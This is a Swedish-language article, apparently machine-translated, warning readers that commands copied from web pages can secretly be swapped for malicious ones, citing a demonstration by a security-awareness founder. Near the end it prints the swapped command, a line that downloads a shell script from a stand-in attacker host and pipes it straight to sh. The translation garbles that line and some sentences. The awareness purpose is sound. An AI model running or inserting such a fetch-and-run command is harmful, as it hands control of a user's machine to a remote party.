- Vi kopierar och klistrar alla från internet dagligen utan att faktiskt veta riskerna.
- En säkerhetsexpert tog sig tid att visa alla ett värsta scenario när de gjorde detta.
- Att klistra in kommandon du fått från internet i din terminal är ett snabbt sätt att bli hackad
- Kommandona du trodde att du klistrade in i din terminal är faktiskt skadliga koder.
Det är sant att vi lever i en tid där hastighet är allt, och att få snabba resultat är allt som betyder något. Men få människor stannar faktiskt upp för en sekund och tänker på konsekvenserna.
På en daglig basis utför miljontals programmerare, administratörer och säkerhetsforskare enkla uppgifter som att kopiera och klistra in kommandon från webbsidor direkt i konsoler på sina datorer.
Även om många inte ens tänker på detta, är konsekvenserna större och farligare än du kanske tror först, särskilt om du lagrar känslig eller värdefull data.
En välkänd säkerhetsexpert tog sig tid att dela vad som egentligen skulle kunna hända om du kopierar+klistrar in innehåll från webbsidor.
Copy+Paste är ett enkelt sätt att faktiskt bli hackad
Gabriel Friedlander, som är grundaren av utbildningsplattformen för säkerhetsmedvetenhet Wizer, drog omslaget av ett schema som får dig att tänka två gånger innan du kopierar och klistrar in kommandon från webbsidor.
Att kopiera och klistra in innehåll från internet har blivit så vanligt nuförtiden att ingen ens tänker på det.
Friedlander varnar dock för att vissa webbsidor är mer bedrägliga än man först kan inse, och vad du tror att du kopierat från den skiljer sig mycket från vad du faktiskt gjorde.
Och det värsta med allt detta är att, utan nödvändig kunskap eller vägledning, inser offren sitt misstag först efter att ha klistrat in texten, då kan det redan vara för sent.
Säkerhetsanalytikern tog också fram ett litet test för sina bloggläsare, bara så att folk faktiskt kan förstå hur lätt det är för dig att ovilligt öppna dörren för cyberkriminella.
Han tillhandahöll ett kommando som är tänkt att kopieras, men den angående sanningen avslöjas först när du klistrar in texten och ser vad du faktiskt introducerade i din installation.
Efter att ha kopierat kommandot som visas i skärmdumpen ovan kommer resultatet av att klistra in det att chockera dig, eftersom det är långt ifrån vad du trodde att du duplicerade.
ringla http://attacker-domain: 8000/shell.sh | shFörutom det helt annorlunda kommandot som finns på ditt urklipp, är nyradstecknet (eller retur) vid slutet av det betyder att exemplet ovan kommer att köras så snart det klistras in direkt i en Linux terminal.
Så du bör vara mer medveten om vad som faktiskt händer och behandla detta som en allvarlig säkerhetsrisk. Vi säger inte att alla webbplatser döljer skadligt innehåll, men det lönar sig att ta hänsyn till detta.
Har du någonsin blivit hackad av att klistra in tvivelaktiga kommandon i din terminal? Dela din upplevelse med oss i kommentarsfältet nedan.
